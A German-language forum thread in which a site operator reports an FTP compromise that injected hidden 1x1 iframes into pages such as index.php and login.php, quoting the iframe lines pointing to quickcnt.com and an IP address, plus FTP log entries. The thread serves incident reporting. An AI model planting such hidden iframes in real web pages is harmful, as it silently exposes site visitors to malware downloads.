quickcnt HTML.IframeBof

Rund um die Sicherheit des Systems und die Applikationen
Post Reply
afrika123
Posts: 82
Joined: 2005-10-31 12:43
 

quickcnt HTML.IframeBof

Post by afrika123 »

Kommt über FTP und erzeugt diesen Code:

Code: Select all

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'> 
FTP LOG :

Code: Select all

Tue May 1 00:53:28 2007 0 209.59.131.117 24593 /www/htdocs/vxxx/index.php a _ i r vxxx ftp 0 * c
Tue May 1 00:53:28 2007 0 209.59.131.117 6730 /www/htdocs/vxxx/login.php a _ o r vxxx ftp 0 * c
Schöne Sache, denn dadurch kommt man bei http://www.stopbadware.org in die Böse Liste und das sieht dann so aus:
http://www.google.de/search?hl=de&q=pro-colors&meta=

1 tes Ergebnis.
rootsvr
Posts: 538
Joined: 2005-09-02 11:12
Contact:
 

Re: quickcnt HTML.IframeBof

Post by rootsvr »

Wo erzeugt er diesen Code?
Und wieso kommt der per FTP rein?

Wenn der Bot es schafft wirklich iFrames auf einer Seite zu hinterlassen ist der Eintrag in die Liste ja berechtigt.
afrika123
Posts: 82
Joined: 2005-10-31 12:43
 

Re: quickcnt HTML.IframeBof

Post by afrika123 »

die infizierten Dateien sind index.html index.php, login.php, main.php, auth,php

Der Angreifer kommt über ftp hinein, nachdem er sich mit einem Virus Namens
Exploit.HTML.Iframe.FileDownload Zugriff verschafft hat.
Neuerdings wird jetzt der Code:

Code: Select all

<iframe src='http://208.69.230.178/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
blattlaus
Posts: 52
Joined: 2007-03-08 13:45
 

Re: quickcnt HTML.IframeBof

Post by blattlaus »

Da in deinen beiden Posts keine einzige Fragezeichen vorkommt, vermute ich mal, dass du garkeine Fragen hast.
Deswegen gibt einfach einen unfreundlichen Kommentar von mir: Dein Sicherheitskonzept, sofern du eins hast, suckt.
Post Reply